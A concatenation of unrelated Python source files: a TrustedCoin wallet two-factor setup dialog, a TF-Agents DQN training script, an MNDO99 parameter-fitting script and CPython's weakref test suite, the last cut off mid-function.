self.TOS = tos
tos_e.tos_signal.emit()
def on_result():
tos_e.setText(self.TOS)
nonlocal tos_received
tos_received = True
set_enabled()
def on_error(msg):
window.show_error(str(msg))
window.terminate()
def set_enabled():
next_button.setEnabled(tos_received and is_valid_email(email_e.text()))
tos_e.tos_signal.connect(on_result)
tos_e.error_signal.connect(on_error)
t = threading.Thread(target=request_TOS)
t.daemon = True
t.start()
email_e.textChanged.connect(set_enabled)
email_e.setFocus(True)
window.exec_layout(vbox, next_enabled=False)
next_button.setText(prior_button_text)
email = str(email_e.text())
self.create_remote_key(email, window)
def request_otp_dialog(self, window, short_id, otp_secret, xpub3):
vbox = QVBoxLayout()
if otp_secret is not None:
uri = "otpauth://totp/%s?secret=%s"%('trustedcoin.com', otp_secret)
l = QLabel("Please scan the following QR code in Google Authenticator. You may as well use the following key: %s"%otp_secret)
l.setWordWrap(True)
vbox.addWidget(l)
qrw = QRCodeWidget(uri)
vbox.addWidget(qrw, 1)
msg = _('Then, enter your Google Authenticator code:')
else:
label = QLabel(
"This wallet is already registered with TrustedCoin. "
"To finalize wallet creation, please enter your Google Authenticator Code. "
)
label.setWordWrap(1)
vbox.addWidget(label)
msg = _('Google Authenticator code:')
hbox = QHBoxLayout()
hbox.addWidget(WWLabel(msg))
pw = AmountEdit(None, is_int = True)
pw.setFocus(True)
pw.setMaximumWidth(50)
hbox.addWidget(pw)
vbox.addLayout(hbox)
cb_lost = QCheckBox(_("I have lost my Google Authenticator account"))
cb_lost.setToolTip(_("Check this box to request a new secret. You will need to retype your seed."))
vbox.addWidget(cb_lost)
cb_lost.setVisible(otp_secret is None)
def set_enabled():
b = True if cb_lost.isChecked() else len(pw.text()) == 6
window.next_button.setEnabled(b)
pw.textChanged.connect(set_enabled)
cb_lost.toggled.connect(set_enabled)
window.exec_layout(vbox, next_enabled=False, raise_on_cancel=False)
self.check_otp(window, short_id, otp_secret, xpub3, pw.get_amount(), cb_lost.isChecked())
|
train_model.py
|
import tensorflow as tf
from tf_agents.agents.dqn import dqn_agent
from tf_agents.environments import tf_py_environment
from tf_agents.networks import q_network
from tf_agents.policies import random_tf_policy
from tf_agents.replay_buffers import tf_uniform_replay_buffer
from tf_agents.trajectories import trajectory
from tf_agents.utils import common
from environments.race_to_the_hot.env import race_to_the_hot
from tqdm import tqdm
import threading
import os
import json
from tf_agents.policies import policy_saver
from multiprocessing import Process
import time
# loading configuration...
print('loading configuration...')
_config = {}
with open('config.json') as f:
_config = json.load(f)
tf.compat.v1.enable_v2_behavior()
tf.config.set_visible_devices([], 'GPU')
class master():
def __init__(self):
self.num_iterations = 20000000
self.initial_collect_steps = 10
self.collect_steps_per_iteration = 100
self.replay_buffer_max_length = 10000
self.batch_size = 64 * 10
self.learning_rate = 0.000001
self.train_steps = 1000
self.num_eval_episodes = 10
self.save_policy_dir = os.path.join(_config['files']['policy']['base_dir'],
_config['files']['policy']['save_policy']['dir'],
_config['files']['policy']['save_policy']['name'])
self.checkpoint_policy_dir = os.path.join(_config['files']['policy']['base_dir'],
_config['files']['policy']['checkpoint_policy']['dir'],
_config['files']['policy']['checkpoint_policy']['name'])
self.train_py_env = race_to_the_hot(window_name='Training')
self.eval_py_env = race_to_the_hot(window_name='Testing')
self.train_env = tf_py_environment.TFPyEnvironment(self.train_py_env)
self.eval_env = tf_py_environment.TFPyEnvironment(self.eval_py_env)
self.agent = None
self.replay_buffer = None
self.random_policy = None
self.train_checkpointer = None
self.tf_policy_saver = None
self.dataset = None
self.train_step_counter = None
self.iterator = None
def build_network(self):
_fc_layer_params = (512,)
_q_net = q_network.QNetwork(
self.train_env.observation_spec(),
self.train_env.action_spec(),
fc_layer_params=_fc_layer_params)
_optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=self.learning_rate)
self.train_step_counter = tf.Variable(0)
self.agent = dqn_agent.DqnAgent(
self.train_env.time_step_spec(),
self.train_env.action_spec(),
q_network=_q_net,
optimizer=_optimizer,
td_errors_loss_fn=common.element_wise_squared_loss,
train_step_counter=self.train_step_counter)
self.agent.initialize()
_eval_policy = self.agent.policy
_collect_policy = self.agent.collect_policy
self.random_policy = random_tf_policy.RandomTFPolicy(self.train_env.time_step_spec(),
self.train_env.action_spec())
self.agent.train_step_counter.assign(0)
def build_replay_buffer(self):
self.replay_buffer = tf_uniform_replay_buffer.TFUniformReplayBuffer(
data_spec=self.agent.collect_data_spec,
batch_size=self.train_env.batch_size,
max_length=self.replay_buffer_max_length)
self.dataset = self.replay_buffer.as_dataset(
num_parallel_calls=3,
sample_batch_size=self.batch_size,
num_steps=2).prefetch(3)
self.agent.train = common.function(self.agent.train)
self.iterator = iter(rtth.dataset)
def save_checkpoint_init(self):
self.train_checkpointer = common.Checkpointer(
ckpt_dir=self.checkpoint_policy_dir,
max_to_keep=1,
agent=self.agent,
policy=self.agent.policy,
replay_buffer=self.replay_buffer,
global_step=self.train_step_counter
)
self.tf_policy_saver = policy_saver.PolicySaver(self.agent.policy)
def compute_avg_return(self, environment, policy, num_episodes=1000):
score = {'win': 0, 'loss': 0, 'timeout': 0}
total_return = 0.0
for _ in range(num_episodes):
time_step = environment.reset()
episode_return = 0.0
while not time_step.is_last():
action_step = policy.action(time_step)
time_step = environment.step(action_step.action)
episode_return += time_step.reward
total_return += episode_return
history = environment._env.envs[0].score_history
final_step = history[len(history) - 1]
if final_step == 'timeout':
score['timeout'] += 1
elif final_step == 'loss':
score['loss'] += 1
elif final_step == 'win':
score['win'] += 1
avg_return = total_return / num_episodes
return avg_return.numpy()[0], score
def collect_step(self, environment, policy, buffer):
time_step = environment.current_time_step()
action_step = policy.action(time_step)
next_time_step = environment.step(action_step.action)
traj = trajectory.from_transition(time_step, action_step, next_time_step)
buffer.add_batch(traj)
def collect_step_threaded(self, environment, policy, buffer):
p = Process(target=self.collect_step, args=(environment, policy, buffer,))
p.start()
def collect_data(self, env, policy, buffer, steps):
for _ in range(steps):
self.collect_step(env, policy, buffer)
def perfom_initial_collect(self):
self.compute_avg_return(self.eval_env, self.agent.policy, self.num_eval_episodes)
def perform_collection(self):
while True:
for _ in tqdm(range(rtth.train_steps)):
for _ in range(rtth.collect_steps_per_iteration):
self.collect_step(self.train_env, self.agent.collect_policy, self.replay_buffer)
def perform_training(self):
while True:
time.sleep(2)
try:
experience, unused_info = next(self.iterator)
train_loss = self.agent.train(experience).loss
except:
lol =1
def perform_testing(self):
while True:
time.sleep(5)
try:
avg_return, score = self.compute_avg_return(self.eval_env, self.agent.collect_policy)
print('Average Return = {0:.2f}, score {1}'.format(avg_return, score))
except:
lol =1
def perform_checkpoint_save(self):
while True:
time.sleep(300)
try:
self.train_checkpointer.save(self.train_step_counter)
print('checkpointed')
except Exception as ie:
print('failed checkpointer')
print(ie)
try:
self.tf_policy_saver.save(self.save_policy_dir)
print('saved')
except Exception as ie:
print('failed saver')
print(ie)
rtth = master()
rtth.build_network()
rtth.build_replay_buffer()
rtth.save_checkpoint_init()
restore_network = False
if restore_network:
rtth.train_checkpointer.initialize_or_restore()
print('initial collect...')
rtth.perfom_initial_collect()
x = threading.Thread(target=rtth.perform_collection, args=())
x.start()
x = threading.Thread(target=rtth.perform_training, args=())
x.start()
x = threading.Thread(target=rtth.perform_checkpoint_save, args=())
x.start()
x = threading.Thread(target=rtth.perform_testing, args=())
x.start()
|
fit.py
|
#!/usr/bin/env python2
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# For more information, please refer to <http://unlicense.org>
import numpy as np
from scipy.optimize import minimize
from numpy.linalg import norm
import os
from copy import deepcopy
import threading
import subprocess
from matplotlib import pyplot
import time
import seaborn as sns
import pandas as pd
output1 = []
output2 = []
output3 = []
output4 = []
def task1():
global output1
cmd = ["./run_mndo99", "master1.inp"]
output1 = subprocess.check_output(cmd)
def task2():
global output2
cmd = ["./run_mndo99", "master2.inp"]
output2 = subprocess.check_output(cmd)
def task3():
global output3
cmd = ["./run_mndo99", "master3.inp"]
output3 = subprocess.check_output(cmd)
def task4():
global output4
cmd = ["./run_mndo99", "master4.inp"]
output4 = subprocess.check_output(cmd)
def run_mndo99_nodisk():
t1 = threading.Thread(target=task1)
t2 = threading.Thread(target=task2)
t3 = threading.Thread(target=task3)
t4 = threading.Thread(target=task4)
t1.start()
t2.start()
t3.start()
t4.start()
t1.join()
t2.join()
t3.join()
t4.join()
out = output1 + output2 + output3 + output4
return out
def parse_reference(filename):
energy = np.zeros((7174))
f = open(filename, "r")
lines = f.readlines()
f.close()
for line in lines:
tokens = line.split()
if len(tokens) == 2:
idx = int(tokens[0])
energy[idx] = float(tokens[1])
return energy
class Parameters:
def __init__(self, names, work_dir="."):
self.names = names
self.n = len(names)
self.work_dir = work_dir
self.reference_energy = parse_reference("dsgdb7ae2.xyz")
self.output1 = []
self.output2 = []
self.output3 = []
self.output4 = []
def write_fort14(self, params):
output = ""
for i in range(self.n):
if "ZP" in self.names[i]:
zp = self.names[i] + " " + str(params[i]) + "\n"
zs = "ZS"+zp[2:]
output += zs
output += zp
elif ("BETAP N" in self.names[i]) or ("BETAP O" in self.names[i]):
betap = self.names[i] + " " + str(params[i]) + "\n"
betas = "BETAS"+betap[5:]
output += betas
output += betap
else:
output += self.names[i] + " " + str(params[i]) + "\n"
f = open( self.work_dir + "/fort.14", "w")
f.write(output)
f.close()
def optimize(self):
return 0
def run_mndo99(self):
os.system("./compute.sh")
def get_energies(self, input_file):
f = open(input_file, "r")
lines = f.readlines()
f.close()
for line in lines:
if "SCF BINDING ENERGY" in line:
energy = float(line[25:42])
return energy
return 0.0 # Some dummy number
def parse_mndo(self):
energy = np.zeros((7174))
input_files = [f for f in os.listdir(self.work_dir) if f.endswith('.log')]
for input_file in input_files:
e = self.get_energies(self.work_dir + "/" + input_file)
idx = int(input_file[:4])
energy[idx] = e
return energy * 23.0609
def parse_master(self, filename):
f = open(filename, "r")
lines = f.readlines()
f.close()
energy = np.zeros((7174))
indexes = []
energies = []
for line in lines:
if "TITLE" in line:
tokens = line.split()
indexes.append(int(tokens[1]))
elif "SCF BINDING ENERGY" in line:
tokens = line.split()
energies.append(float(tokens[3]))
for i, idx in enumerate(indexes):
energy[idx] = energies[i]
def parse_master_precise(self, mndo_output):
lines = mndo_output.split("\n")
energy = np.zeros((7174))
mode = "begin"
e_scf = 0
e_nuc = 0
e_iso = 0
molid = 0
for i, line in enumerate(lines):
if mode == "enuc":
if "NUCLEAR ENERGY" in line:
e_nuc = float(line.split()[2])
energy[molid] = e_nuc + e_scf - e_iso
# print "SCF TOTAL ENERGY", e_nuc + e_scf - e_iso
mode = "begin"
if mode == "eisol":
if "TOTAL ENERGY OF THE ATOM (CALC)" in line:
tokens = line.split()
idx = int(tokens[0])
e = float(tokens[2])
eisol[idx] = e
if " nexmol=-1" in line:
tokens = lines[i-5].split()
e_scf = float(tokens[1])
e_iso = np.sum(atoms * eisol)
tokens = lines[i-1].split()
molid = int(tokens[1])
mode = "enuc"
if mode == "atoms":
tokens = line.split()
if len(tokens) == 5:
idx = int(tokens[1])
atoms[idx] += 1.0
if "****" in line:
mode = "eisol"
# print atoms
eisol = np.zeros((20))
if mode == "begin":
if " NUMBER NUMBER (ANGSTROMS) (ANGSTROMS) (ANGSTROMS" in line:
mode = "atoms"
atoms = np.zeros((20))
return energy * 23.0609
def get_penalty(self, calc):
epsilon = 0.0001
rmsd = 0.0
n = 0
for i in range(len(calc)):
if (abs(calc[i]) > epsilon) and \
(abs(self.reference_energy[i]) > epsilon):
rmsd += (calc[i] - self.reference_energy[i])**2
n += 1
rmsd /= n
return np.sqrt(rmsd)
def optimize(self, values):
self.write_fort14(values)
# self.run_mndo99()
mndo_output = run_mndo99_nodisk()
calc_energies = self.parse_master_precise(mndo_output)
penalty = self.get_penalty(calc_energies)
# print "ENERGY: %12.7f" % (penalty)
return penalty
def jacobian(self, values):
zenergy = self.optimize(values)
print "ENERGY: %12.7f" % (zenergy)
grad = []
for i, p in enumerate(values):
dparams = deepcopy(values)
dh = 0.000001
dparams[i] += dh
energy_high = nv.optimize(dparams)
dparams[i] -= (2.0 * dh)
energy_low = nv.optimize(dparams)
de = energy_high - energy_low
grad.append(de/(2.0 * dh))
s = nv.names[i]
# print de
print "%3i %8s %15.7f dE/dP = %22.10f" % \
(i+1, s, values[i], de/dh)
grad = np.array(grad)
print "GRADIENT NORM:", norm(grad)
print
print " Numpy formatted values at this point:"
print " values = np.array(["
for v in values:
print "%20.15f," % v
print "])"
print
return grad
if __name__ == "__main__":
from mndo import names
from mndo import values_optimized as values
nv = Parameters(names)
# minimize(nv.optimize, values, jac=nv.jacobian, method="Newton-CG",
# minimize(nv.optimize, values, method="Powell",
minimize(nv.optimize, values, jac=nv.jacobian, method="L-BFGS-B",
options={"maxiter": 1000, "disp": True})
# ydata = pd.DataFrame(dict({ "Calculated" : er,
# "Predicted" : e}))
# rmsd = get_rmsd(er, e)
# print "RMSD = %6.2f kcal/mol" % rmsd
# sns.set(style="whitegrid")
# ax = sns.lmplot(x="Calculated", y="Predicted", data=ydata)
# ax.set(xlim=[-2500, -500], ylim=[-2500,-500])
# ax.set(ylabel='PBE0/def2-TZVP HoF [kcal/mol]', xlabel='DFTB3 + ML-correction HoF [kcal/mol]')
# pyplot.savefig("correlation.png")
|
test_weakref.py
|
import gc
import sys
import unittest
import collections
import weakref
import operator
import contextlib
import copy
import threading
import time
import random
from test import support
from test.support import script_helper, ALWAYS_EQ
# Used in ReferencesTestCase.test_ref_created_during_del() .
ref_from_del = None
# Used by FinalizeTestCase as a global that may be replaced by None
# when the interpreter shuts down.
_global_var = 'foobar'
class C:
def method(self):
pass
class Callable:
bar = None
def __call__(self, x):
self.bar = x
def create_function():
def f(): pass
return f
def create_bound_method():
return C().method
class Object:
def __init__(self, arg):
self.arg = arg
def __repr__(self):
return "<Object %r>" % self.arg
def __eq__(self, other):
if isinstance(other, Object):
return self.arg == other.arg
return NotImplemented
def __lt__(self, other):
if isinstance(other, Object):
return self.arg < other.arg
return NotImplemented
def __hash__(self):
return hash(self.arg)
def some_method(self):
return 4
def other_method(self):
return 5
class RefCycle:
def __init__(self):
self.cycle = self
class TestBase(unittest.TestCase):
def setUp(self):
self.cbcalled = 0
def callback(self, ref):
self.cbcalled += 1
@contextlib.contextmanager
def collect_in_thread(period=0.0001):
"""
Ensure GC collections happen in a different thread, at a high frequency.
"""
please_stop = False
def collect():
while not please_stop:
time.sleep(period)
gc.collect()
with support.disable_gc():
t = threading.Thread(target=collect)
t.start()
try:
yield
finally:
please_stop = True
t.join()
class ReferencesTestCase(TestBase):
def test_basic_ref(self):
self.check_basic_ref(C)
self.check_basic_ref(create_function)
self.check_basic_ref(create_bound_method)
# Just make sure the tp_repr handler doesn't raise an exception.
# Live reference:
o = C()
wr = weakref.ref(o)
repr(wr)
# Dead reference:
del o
repr(wr)
def test_basic_callback(self):
self.check_basic_callback(C)
self.check_basic_callback(create_function)
self.check_basic_callback(create_bound_method)
@support.cpython_only
def test_cfunction(self):
import _testcapi
create_cfunction = _testcapi.create_cfunction
f = create_cfunction()
wr = weakref.ref(f)
self.assertIs(wr(), f)
del f
self.assertIsNone(wr())
self.check_basic_ref(create_cfunction)
self.check_basic_callback(create_cfunction)
def test_multiple_callbacks(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del o
self.assertIsNone(ref1(), "expected reference to be invalidated")
self.assertIsNone(ref2(), "expected reference to be invalidated")
self.assertEqual(self.cbcalled, 2,
"callback not called the right number of times")
def test_multiple_selfref_callbacks(self):
# Make sure all references are invalidated before callbacks are called
#
# What's important here is that we're using the first
# reference in the callback invoked on the second reference
# (the most recently created ref is cleaned up first). This
# tests that all references to the object are invalidated
# before any of the callbacks are invoked, so that we only
# have one invocation of _weakref.c:cleanup_helper() active
# for a particular object at a time.
#
def callback(object, self=self):
self.ref()
c = C()
self.ref = weakref.ref(c, callback)
ref1 = weakref.ref(c, callback)
del c
def test_constructor_kwargs(self):
c = C()
self.assertRaises(TypeError, weakref.ref, c, callback=None)
def test_proxy_ref(self):
o = C()
o.bar = 1
ref1 = weakref.proxy(o, self.callback)
ref2 = weakref.proxy(o, self.callback)
del o
def check(proxy):
proxy.bar
self.assertRaises(ReferenceError, check, ref1)
self.assertRaises(ReferenceError, check, ref2)
self.assertRaises(ReferenceError, bool, weakref.proxy(C()))
self.assertEqual(self.cbcalled, 2)
def check_basic_ref(self, factory):
o = factory()
ref = weakref.ref(o)
self.assertIsNotNone(ref(),
"weak reference to live object should be live")
o2 = ref()
self.assertIs(o, o2,
"<ref>() should return original object if live")
def check_basic_callback(self, factory):
self.cbcalled = 0
o = factory()
ref = weakref.ref(o, self.callback)
del o
self.assertEqual(self.cbcalled, 1,
"callback did not properly set 'cbcalled'")
self.assertIsNone(ref(),
"ref2 should be dead after deleting object reference")
def test_ref_reuse(self):
o = C()
ref1 = weakref.ref(o)
# create a proxy to make sure that there's an intervening creation
# between these two; it should make no difference
proxy = weakref.proxy(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
o = C()
proxy = weakref.proxy(o)
ref1 = weakref.ref(o)
ref2 = weakref.ref(o)
self.assertIs(ref1, ref2,
"reference object w/out callback should be re-used")
self.assertEqual(weakref.getweakrefcount(o), 2,
"wrong weak ref count for object")
del proxy
self.assertEqual(weakref.getweakrefcount(o), 1,
"wrong weak ref count for object after deleting proxy")
def test_proxy_reuse(self):
o = C()
proxy1 = weakref.proxy(o)
ref = weakref.ref(o)
proxy2 = weakref.proxy(o)
self.assertIs(proxy1, proxy2,
"proxy object w/out callback should have been re-used")
def test_basic_proxy(self):
o = C()
self.check_proxy(o, weakref.proxy(o))
L = collections.UserList()
p = weakref.proxy(L)
self.assertFalse(p, "proxy for empty UserList should be false")
p.append(12)
self.assertEqual(len(L), 1)
self.assertTrue(p, "proxy for non-empty UserList should be true")
p[:] = [2, 3]
self.assertEqual(len(L), 2)
self.assertEqual(len(p), 2)
self.assertIn(3, p, "proxy didn't support __contains__() properly")
p[1] = 5
self.assertEqual(L[1], 5)
self.assertEqual(p[1], 5)
L2 = collections.UserList(L)
p2 = weakref.proxy(L2)
self.assertEqual(p, p2)
## self.assertEqual(repr(L2), repr(p2))
L3 = collections.UserList(range(10))
p3 = weakref.proxy(L3)
self.assertEqual(L3[:], p3[:])
self.assertEqual(L3[5:], p3[5:])
self.assertEqual(L3[:5], p3[:5])
self.assertEqual(L3[2:5], p3[2:5])
def test_proxy_unicode(self):
# See bug 5037
class C(object):
def __str__(self):
return "string"
def __bytes__(self):
return b"bytes"
instance = C()
self.assertIn("__bytes__", dir(weakref.proxy(instance)))
self.assertEqual(bytes(weakref.proxy(instance)), b"bytes")
def test_proxy_index(self):
class C:
def __index__(self):
return 10
o = C()
p = weakref.proxy(o)
self.assertEqual(operator.index(p), 10)
def test_proxy_div(self):
class C:
def __floordiv__(self, other):
return 42
def __ifloordiv__(self, other):
return 21
o = C()
p = weakref.proxy(o)
self.assertEqual(p // 5, 42)
p //= 5
self.assertEqual(p, 21)
def test_proxy_matmul(self):
class C:
def __matmul__(self, other):
return 1729
def __rmatmul__(self, other):
return -163
def __imatmul__(self, other):
return 561
o = C()
p = weakref.proxy(o)
self.assertEqual(p @ 5, 1729)
self.assertEqual(5 @ p, -163)
p @= 5
self.assertEqual(p, 561)
# The PyWeakref_* C API is documented as allowing either NULL or
# None as the value for the callback, where either means "no
# callback". The "no callback" ref and proxy objects are supposed
# to be shared so long as they exist by all callers so long as
# they are active. In Python 2.3.3 and earlier, this guarantee
# was not honored, and was broken in different ways for
# PyWeakref_NewRef() and PyWeakref_NewProxy(). (Two tests.)
def test_shared_ref_without_callback(self):
self.check_shared_without_callback(weakref.ref)
def test_shared_proxy_without_callback(self):
self.check_shared_without_callback(weakref.proxy)
def check_shared_without_callback(self, makeref):
o = Object(1)
p1 = makeref(o, None)
p2 = makeref(o, None)
self.assertIs(p1, p2, "both callbacks were None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o, None)
self.assertIs(p1, p2, "callbacks were NULL, None in the C API")
del p1, p2
p1 = makeref(o)
p2 = makeref(o)
self.assertIs(p1, p2, "both callbacks were NULL in the C API")
del p1, p2
p1 = makeref(o, None)
p2 = makeref(o)
self.assertIs(p1, p2, "callbacks were None, NULL in the C API")
def test_callable_proxy(self):
o = Callable()
ref1 = weakref.proxy(o)
self.check_proxy(o, ref1)
self.assertIs(type(ref1), weakref.CallableProxyType,
"proxy is not of callable type")
ref1('twinkies!')
self.assertEqual(o.bar, 'twinkies!',
"call through proxy not passed through to original")
ref1(x='Splat.')
self.assertEqual(o.bar, 'Splat.',
"call through proxy not passed through to original")
# expect due to too few args
self.assertRaises(TypeError, ref1)
# expect due to too many args
self.assertRaises(TypeError, ref1, 1, 2, 3)
def check_proxy(self, o, proxy):
o.foo = 1
self.assertEqual(proxy.foo, 1,
"proxy does not reflect attribute addition")
o.foo = 2
self.assertEqual(proxy.foo, 2,
"proxy does not reflect attribute modification")
del o.foo
self.assertFalse(hasattr(proxy, 'foo'),
"proxy does not reflect attribute removal")
proxy.foo = 1
self.assertEqual(o.foo, 1,
"object does not reflect attribute addition via proxy")
proxy.foo = 2
self.assertEqual(o.foo, 2,
"object does not reflect attribute modification via proxy")
del proxy.foo
self.assertFalse(hasattr(o, 'foo'),
"object does not reflect attribute removal via proxy")
def test_proxy_deletion(self):
# Test clearing of SF bug #762891
class Foo:
result = None
def __delitem__(self, accessor):
self.result = accessor
g = Foo()
f = weakref.proxy(g)
del f[0]
self.assertEqual(f.result, 0)
def test_proxy_bool(self):
# Test clearing of SF bug #1170766
class List(list): pass
lyst = List()
self.assertEqual(bool(weakref.proxy(lyst)), bool(lyst))
def test_proxy_iter(self):
# Test fails with a debug build of the interpreter
# (see bpo-38395).
obj = None
class MyObj:
def __iter__(self):
nonlocal obj
del obj
return NotImplemented
obj = MyObj()
p = weakref.proxy(obj)
with self.assertRaises(TypeError):
# "blech" in p calls MyObj.__iter__ through the proxy,
# without keeping a reference to the real object, so it
# can be killed in the middle of the call
"blech" in p
def test_proxy_reversed(self):
class MyObj:
def __len__(self):
return 3
def __reversed__(self):
return iter('cba')
obj = MyObj()
self.assertEqual("".join(reversed(weakref.proxy(obj))), "cba")
def test_proxy_hash(self):
cool_hash = 299_792_458
class MyObj:
def __hash__(self):
return cool_hash
obj = MyObj()
self.assertEqual(hash(weakref.proxy(obj)), cool_hash)
def test_getweakrefcount(self):
o = C()
ref1 = weakref.ref(o)
ref2 = weakref.ref(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 2,
"got wrong number of weak reference objects")
proxy1 = weakref.proxy(o)
proxy2 = weakref.proxy(o, self.callback)
self.assertEqual(weakref.getweakrefcount(o), 4,
"got wrong number of weak reference objects")
del ref1, ref2, proxy1, proxy2
self.assertEqual(weakref.getweakrefcount(o), 0,
"weak reference objects not unlinked from"
" referent when discarded.")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefcount(1), 0,
"got wrong number of weak reference objects for int")
def test_getweakrefs(self):
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref1
self.assertEqual(weakref.getweakrefs(o), [ref2],
"list of refs does not match")
o = C()
ref1 = weakref.ref(o, self.callback)
ref2 = weakref.ref(o, self.callback)
del ref2
self.assertEqual(weakref.getweakrefs(o), [ref1],
"list of refs does not match")
del ref1
self.assertEqual(weakref.getweakrefs(o), [],
"list of refs not cleared")
# assumes ints do not support weakrefs
self.assertEqual(weakref.getweakrefs(1), [],
"list of refs does not match for int")
def test_newstyle_number_ops(self):
class F(float):
pass
f = F(2.0)
p = weakref.proxy(f)
self.assertEqual(p + 1.0, 3.0)
self.assertEqual(1.0 + p, 3.0) # this used to SEGV
def test_callbacks_protected(self):
# Callbacks protected from already-set exceptions?
# Regression test for SF bug #478534.
class BogusError(Exception):
pass
data = {}
def remove(k):
del data[k]
def encapsulate():
f = lambda : ()
data[weakref.ref(f, remove)] = None
raise BogusError
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
try:
encapsulate()
except BogusError:
pass
else:
self.fail("exception not properly restored")
def test_sf_bug_840829(self):
# "weakref callbacks and gc corrupt memory"
# subtype_dealloc erroneously exposed a new-style instance
# already in the process of getting deallocated to gc,
# causing double-deallocation if the instance had a weakref
# callback that triggered gc.
# If the bug exists, there probably won't be an obvious symptom
# in a release build. In a debug build, a segfault will occur
# when the second attempt to remove the instance from the "list
# of all objects" occurs.
import gc
class C(object):
pass
c = C()
wr = weakref.ref(c, lambda ignore: gc.collect())
del c
# There endeth the first part. It gets worse.
del wr
c1 = C()
c1.i = C()
wr = weakref.ref(c1.i, lambda ignore: gc.collect())
c2 = C()
c2.c1 = c1
del c1 # still alive because c2 points to it
# Now when subtype_dealloc gets called on c2, it's not enough just
# that c2 is immune from gc while the weakref callbacks associated
# with c2 execute (there are none in this 2nd half of the test, btw).
# subtype_dealloc goes on to call the base classes' deallocs too,
# so any gc triggered by weakref callbacks associated with anything
# torn down by a base class dealloc can also trigger double
# deallocation of c2.
del c2
def test_callback_in_cycle_1(self):
import gc
class J(object):
pass
class II(object):
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
# Now J and II are each in a self-cycle (as all new-style class
# objects are, since their __mro__ points back to them). I holds
# both a weak reference (I.wr) and a strong reference (I.J) to class
# J. I is also in a cycle (I.wr points to a weakref that references
# I.acallback). When we del these three, they all become trash, but
# the cycles prevent any of them from getting cleaned up immediately.
# Instead they have to wait for cyclic gc to deduce that they're
# trash.
#
# gc used to call tp_clear on all of them, and the order in which
# it does that is pretty accidental. The exact order in which we
# built up these things manages to provoke gc into running tp_clear
# in just the right order (I last). Calling tp_clear on II leaves
# behind an insane class object (its __mro__ becomes NULL). Calling
# tp_clear on J breaks its self-cycle, but J doesn't get deleted
# just then because of the strong reference from I.J. Calling
# tp_clear on I starts to clear I's __dict__, and just happens to
# clear I.J first -- I.wr is still intact. That removes the last
# reference to J, which triggers the weakref callback. The callback
# tries to do "self.J", and instances of new-style classes look up
# attributes ("J") in the class dict first. The class (II) wants to
# search II.__mro__, but that's NULL. The result was a segfault in
# a release build, and an assert failure in a debug build.
del I, J, II
gc.collect()
def test_callback_in_cycle_2(self):
import gc
# This is just like test_callback_in_cycle_1, except that II is an
# old-style class. The symptom is different then: an instance of an
# old-style class looks in its own __dict__ first. 'J' happens to
# get cleared from I.__dict__ before 'wr', and 'J' was never in II's
# __dict__, so the attribute isn't found. The difference is that
# the old-style II doesn't have a NULL __mro__ (it doesn't have any
# __mro__), so no segfault occurs. Instead it got:
# test_callback_in_cycle_2 (__main__.ReferencesTestCase) ...
# Exception exceptions.AttributeError:
# "II instance has no attribute 'J'" in <bound method II.acallback
# of <?.II instance at 0x00B9B4B8>> ignored
class J(object):
pass
class II:
def acallback(self, ignore):
self.J
I = II()
I.J = J
I.wr = weakref.ref(J, I.acallback)
del I, J, II
gc.collect()
def test_callback_in_cycle_3(self):
import gc
# This one broke the first patch that fixed the last two. In this
# case, the objects reachable from the callback aren't also reachable
# from the object (c1) *triggering* the callback: you can get to
# c1 from c2, but not vice-versa. The result was that c2's __dict__
# got tp_clear'ed by the time the c2.cb callback got invoked.
class C:
def cb(self, ignore):
self.me
self.c1
self.wr
c1, c2 = C(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2
gc.collect()
def test_callback_in_cycle_4(self):
import gc
# Like test_callback_in_cycle_3, except c2 and c1 have different
# classes. c2's class (C) isn't reachable from c1 then, so protecting
# objects reachable from the dying object (c1) isn't enough to stop
# c2's class (C) from getting tp_clear'ed before c2.cb is invoked.
# The result was a segfault (C.__mro__ was NULL when the callback
# tried to look up self.me).
class C(object):
def cb(self, ignore):
self.me
self.c1
self.wr
class D:
pass
c1, c2 = D(), C()
c2.me = c2
c2.c1 = c1
c2.wr = weakref.ref(c1, c2.cb)
del c1, c2, C, D
gc.collect()
def test_callback_in_cycle_resurrection(self):
import gc
# Do something nasty in a weakref callback: resurrect objects
# from dead cycles. For this to be attempted, the weakref and
# its callback must also be part of the cyclic trash (else the
# objects reachable via the callback couldn't be in cyclic trash
# to begin with -- the callback would act like an external root).
# But gc clears trash weakrefs with callbacks early now, which
# disables the callbacks, so the callbacks shouldn't get called
# at all (and so nothing actually gets resurrected).
alist = []
class C(object):
def __init__(self, value):
self.attribute = value
def acallback(self, ignore):
alist.append(self.c)
c1, c2 = C(1), C(2)
c1.c = c2
c2.c = c1
c1.wr = weakref.ref(c2, c1.acallback)
c2.wr = weakref.ref(c1, c2.acallback)
def C_went_away(ignore):
